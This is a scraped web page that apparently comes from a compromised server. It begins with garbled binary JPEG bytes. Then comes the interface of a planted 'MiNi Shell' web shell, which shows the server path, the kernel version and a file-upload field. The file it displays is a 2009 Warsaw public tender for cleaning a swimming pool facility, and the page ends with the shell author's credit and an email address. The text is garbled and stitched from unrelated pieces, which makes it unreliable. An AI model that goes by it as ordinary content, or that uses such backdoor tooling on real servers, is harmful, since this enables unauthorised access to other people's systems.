JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090415/62391-N-2009.html

<p class="kh_header"><b>Warszawa: Świadczenie usług w zakresie sprzątania hali basenowej oraz pomieszczeń dostępnych dla klientów w Ośrodku Inflancka w Warszawie przy ul. Inflanckiej 8.</b><br>
<b>Numer ogłoszenia: 62391 - 2009; data zamieszczenia: 15.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Warszawskie Ośrodki Wypoczynku "Wisła" , ul. Szpitalna 5, 00-031 Warszawa, woj. mazowieckie, tel. 0-22 827 67 76, faks 0-22 827 67 78.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wowwisla.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie sprzątania hali basenowej oraz pomieszczeń dostępnych dla klientów w Ośrodku Inflancka w Warszawie przy ul. Inflanckiej 8..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	POMIESZCZENIA DOSTĘPNE DLA KLIENTÓW (ok. 900m2)
1.	HOL GŁÓWNY
a.)	Codziennie:
- mycie podłogi, cokołów,
- mycie luster,
- mycie drzwi,
- kosze na śmieci - opróżniane i myte wewnątrz i na zewnątrz,
- mycie automatu do sprzedaży kawy,
- mycie automatów do sprzedaży słodyczy,
- sprzątanie chodników.
b.)	Raz na tydzień:
- mycie konstrukcji brązowej,
- mycie konstrukcji niebieskiej,
- mycie ławeczek,
- przetarcie tabliczek informacyjnych, 	
- mycie dekoracji,
- mycie drzwi: do pomieszczenia socjalnego, szatni, elektryków, WC.
c.)	Raz na miesiąc:
- sufit i ściany wzdłuż szatni,
- oświetlenie,
- mycie konstrukcji - słup przy schodach do sali gimnastycznej oraz schodów na salę gimnastyczną.


2.	HOL PRZY KASIE
a.)	Codziennie:
- sprzątanie chodników,
- mycie podłogi, cokołów,
- mycie i dezynfekcja ławeczek,
- kosz na śmieci - opróżnianie i mycie wewnątrz i na zewnątrz.
b.)	Raz na tydzień:
- mycie konstrukcji niebieskiej,
- mycie grzejnika,
- wejście do budynku - czyszczenie płytek gresowych na zewnątrz.
c.)	Raz na miesiąc:
- sufit i ściany,
- oświetlenie.

3.	TOALETA W HOLU GŁÓWNYM
a.)	Codziennie:
- mycie umywalki, syfonu, baterii,
- mycie misek ustępowych, górnopłuków,
- mycie pojemników na papier,
- mycie podłogi, cokołów,
- mycie glazury,
- mycie kratki odpływowej,
- kosz na śmieci - opróżnianie i mycie wewnątrz i na zewnątrz,
- mycie drzwi do toalet
- oświetlenie.

4.	TOALETY W SZATNI DAMSKIEJ I MĘSKIEJ
a.)	Codziennie:
- mycie umywalki, syfonu, baterii,
- mycie pojemników na papier,
- mycie drzwi do kabin w przejściach na basen - przed łącznikiem,
- mycie misek ustępowych, górnopłuków, pisuarów,
- mycie podłogi, cokołów,
- mycie kratek odpływowych,
- wentylacyjna,
- mycie glazury,
- kosze na śmieci - opróżnianie i mycie wewnątrz i na zewnątrz.
b.)	Raz na miesiąc:
- sufit i ściany,
- oświetlenie.

5.	SZATNIA DAMSKA
a.)	Codziennie:
- mycie podłogi, cokołów,
- mycie glazury, lamperii,
- mycie luster,
- kosze na śmieci - opróżnianie i mycie wewnątrz i na zewnątrz,
- mycie i dezynfekcja ławeczek i stołeczków,
- mycie suszarek do włosów, wraz z rączkami.
b.)	Raz na tydzień:
- mycie szafek ubraniowych - wewnątrz i na zewnątrz,
- mycie grzejników,
- mycie konstrukcji boksów,
- mycie ścianek przebieralni.
c.)	Raz na miesiąc:
- sufit i ściany,
- kanały wentylacyjne,
- oświetlenie.

6.	SZATNIA MĘSKA
a.)	Codziennie:
- mycie podłogi i cokołów,
- mycie glazury, lamperii,
- mycie luster,
- kosze na śmieci - opróżniane i myte wewnątrz i na zewnątrz,
- mycie suszarek do włosów, wraz z rączkami,
- mycie i dezynfekcja ławeczek,
- mycie drzwi metalowych (nieczynnych) w przedsionku i na terenie szatni.
b.)	Raz na tydzień:
- mycie szafek ubraniowych - wewnątrz i na zewnątrz,
- mycie grzejników,
- mycie konstrukcji boksów,
- mycie ścianek przebieralni.
c.)	Raz na miesiąc:
- sufit i ściany,
- kanały wentylacyjne,
- oświetlenie.

7.	NATRYSKI DAMSKIE
a.)	Codziennie:
- mycie drzwi białych w przejściu na basen,
- mycie terakoty i cokołów,
- mycie glazury,
- kratki odpływowe.
b.)	Raz na tydzień:
- przetarcie grzejników,
- usuwanie kamienia z sitek prysznicowych.
c.)	Raz na miesiąc:
- kanały wentylacyjne,
- sufit i ściany.

8.	NATRYSKI MĘSKIE
a.)	Codziennie:
- mycie drzwi białych w przejściu na basen,
- mycie terakoty i cokołów,
- mycie glazury,
- kratki odpływowe.
b.)	Raz na tydzień:
- przetarcie grzejników,
- usuwanie kamienia z sitek prysznicowych.
c.)	Raz na miesiąc:
- kanały wentylacyjne,
- sufit i ściany.

9.	PRZEJŚCIE NA BASEN - ZA PRYSZNICAMI
a.)	Codziennie:
- mycie terakoty i cokołów,
- mycie glazury,
- mycie drzwi plastikowych wraz z szybą.
b.)	Raz na tydzień:
- mycie grzejnika,
- mycie szyb i białych framug od strony szatni męskiej,
- mycie drzwi automatycznych na hol wraz z szybą.
c.)	Raz na miesiąc:
- kanały wentylacyjne,
- sufit i ściany,
- oświetlenie.

10.	ŁĄCZNIKI
a.)	Codziennie:
- mycie terakoty i cokołów.
b.)	Raz na tydzień:
- mycie konstrukcji niebieskiej,
- mycie szyb,
- mycie ścianki z glazury przy drzwiach brązowych.
c.)	Co dwa tygodnie:
- oświetlenie.
- mycie konstrukcji białej.

11.	OGÓLNE
a.)	Codziennie:
- dezynfekcja wszystkich powierzchni podłogowych w obrębie tzw. mokrej stopy, tj.: szatnie, natryski, toalety i przejścia na pływalnię oraz uchwytów suszarek do włosów, ławeczek i stołeczków.


II.	HALA BASENOWA (ok. 600m2) - w godzinach od 2200 do 700
a.)	Codziennie:
- mycie i dezynfekcja płyty basenu - płytki podłogowe i kostka Bauma,
- kosze na śmieci - opróżnianie i mycie wewnątrz i na zewnątrz,
- mycie szyb w 3 parach drzwi obrotowych,
- mycie rantów, przelewów i czyszczenie sitek przelewowych niecki pływalni,
- mycie i dezynfekcja jacuzzi - boki zewnętrzne, kratki, schody i poręcze,
- przecieranie drabinek i kaskad,
- dezynfekcja schodów na zjeżdżalnię.
b.)	Dwa razy w tygodniu:
- mycie zjeżdżalni wraz z konstrukcją i ślizgiem - wewnątrz i na zewnątrz,
- mycie słonika - całość,
- mycie lądowiska, schodów i poręczy zjeżdżalni.
c.)	Raz na tydzień:
- mycie konstrukcji 3 par drzwi obrotowych,
- spłukanie podłogi w wyjściu awaryjnym,
- przetarcie konstrukcji dmuchawy,
- umycie całego jacuzzi - zewnątrz i wewnątrz po uprzednim spuszczeniu wody,
- mycie wnętrza balonu hali basenowej do wysokości 3m - ściany i metalowa konstrukcja.
d.)	Co dwa tygodnie:
- przetarcie tablic informacyjnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.60.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu. W postępowaniu mogą wziąć udział oferenci którzy: spełniają warunki określone w art. 22 ust.1 ustawy, złożą ofertę obejmującą całość zamówienia. Złożenie przez oferenta w ofercie dokumentów i oświadczeń będzie stanowiło postawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający sprawdzi treść tych dokumentów i oświadczeń pod względem czy oferent spełnia wszystkie zawarte tam warunki. Uwaga :Zamawiający wykluczy z postępowania Oferenta który nie spełnia wymaganych warunków oraz jeżeli stwierdzi, ze dostarczone przez niego informacje istotne dla prowadzonego postępowania są nieprawdziwe.
Wymagane dokumenty:
Odpis KRS z rejestru przedsiębiorców lub wypis z właściwego Urzędu Gminy o 
    prowadzeniu działalności gospodarczej 
 Zaświadczenie z Urzędu Skarbowego o nie zaleganiu w opłacaniu  podatków - 
 Zaświadczenie ZUS lub KRUS o nie zaleganiu z opłatami należnych składek - 
 Informację z Krajowego rejestru Karnego, o której mowa w pkt. 6.4 i pkt. 6.5 -.</li>
</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wowwisla.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.wowwisla.waw.pl lub ul. Szpitalna 5 00-031 Warszawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2009 godzina 12:00, miejsce: przy ul. Szpitalnej 5 IV p. sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com